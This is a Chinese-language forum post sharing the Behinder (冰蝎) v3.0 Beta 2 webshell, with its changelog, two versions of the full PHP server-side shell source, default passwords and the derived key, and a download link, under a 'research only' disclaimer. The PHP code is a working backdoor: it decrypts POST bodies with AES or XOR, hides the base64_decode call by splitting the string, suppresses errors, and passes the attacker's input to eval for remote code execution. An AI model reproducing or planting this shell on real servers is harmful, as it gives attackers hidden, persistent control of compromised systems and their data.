请选择 进入手机版 | 继续访问电脑版
查看: 223|回复: 0

冰蝎Behinder_v3.0 Beta 2 webshell

[复制链接]

签到天数: 25 天

[LV.4]偶尔看看III

134

主题

140

帖子

3114

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
3114

活跃会员宣传达人灌水之王热心会员推广达人突出贡献优秀版主荣誉管理论坛元老

发表于 2020-8-18 09:03:41 | 显示全部楼层 |阅读模式

bx

bx



###2020.8.17 v3.0 Beta 2 更新日志
1.新增了jspx、asp版本服务端,修复了aspx服务端;
2.新增双击打开功能;
3.修复了路径中有中文导致“找不到数据文件”的问题;
4.修复了文件管理UI重叠问题;
5.“设置代理”新增Socks代理连接功能;


###2020.8.16 v3.0 Beta 1 更新日志
1.去除动态密钥协商机制,采用预共享密钥,全程无明文交互,密钥格式为md5("admin")[0:16];
2.增加了插件机制,可开发安装自定义扩展插件;
3.UI框架由awt改为javafx,重写了大量逻辑;
4.增强了内网穿透功能,在原有的基于HTTP的socks5隧道基础上,增加了单端口转发功能,可一键将内网端口映射至VPS或者本机端口;
这次更新比计划提前了一个月左右,略有仓促,几个核心功能还没有完工,所以这段时间可能会密集更新:)

冰蝎Behinder phpshell源代码(仅供研究使用切勿用于非法用途)
密*码:pass

  1. <?php
  2. @error_reporting(0);
  3. session_start();
  4. if (isset($_GET['pass']))
  5. {
  6.     $key=substr(md5(uniqid(rand())),16);
  7.     $_SESSION['k']=$key;
  8.     print $key;
  9. }
  10. else
  11. {
  12.     $key=$_SESSION['k'];
  13.         $post=file_get_contents("php://input");
  14.         if(!extension_loaded('openssl'))
  15.         {
  16.                 $t="base64_"."decode";
  17.                 $post=$t($post."");
  18.                
  19.                 for($i=0;$i<strlen($post);$i++) {
  20.                              $post[$i] = $post[$i]^$key[$i+1&15];
  21.                             }
  22.         }
  23.         else
  24.         {
  25.                 $post=openssl_decrypt($post, "AES128", $key);
  26.         }
  27.     $arr=explode('|',$post);
  28.     $func=$arr[0];
  29.     $params=$arr[1];
  30.         class C{public function __construct($p) {eval($p."");}}
  31.         @new C($params);
  32. }
  33. ?>
复制代码


冰蝎Behinder_v3.0 Beta 2 phpshell源代码
  1. <?php
  2. @error_reporting(0);
  3. session_start();

  4. if ($_SERVER['REQUEST_METHOD'] === 'POST')
  5. {
  6.     $key="e45e329feb5d925b";
  7.         $_SESSION['k']=$key;
  8.         $post=file_get_contents("php://input");
  9.         if(!extension_loaded('openssl'))
  10.         {
  11.                 $t="base64_"."decode";
  12.                 $post=$t($post."");
  13.                
  14.                 for($i=0;$i<strlen($post);$i++) {
  15.                              $post[$i] = $post[$i]^$key[$i+1&15];
  16.                             }
  17.         }
  18.         else
  19.         {
  20.                 $post=openssl_decrypt($post, "AES128", $key);
  21.         }
  22.     $arr=explode('|',$post);
  23.     $func=$arr[0];
  24.     $params=$arr[1];
  25.         class C{public function __invoke($p) {eval($p."");}}
  26.     @call_user_func(new C(),$params);
  27. }
  28. ?>
复制代码
密*码:rebeyond  md5解密 (e45e329feb5d925b)

md5解密

md5解密


上冰蝎Behinder_v3.0 Beta 2连接

phpinfo

phpinfo


webshell管理

webshell管理




下载地址仅供研究使用:https://github.com/rebeyond/Behinder/releases



回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|小黑屋| TTFY论坛-IT信息技术计算机行业交流发表平台 ( 黔ICP备19006062号 )

GMT+8, 2020-9-22 08:31 , Processed in 0.029307 second(s), 34 queries .

Powered by Discuz! X3.4

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表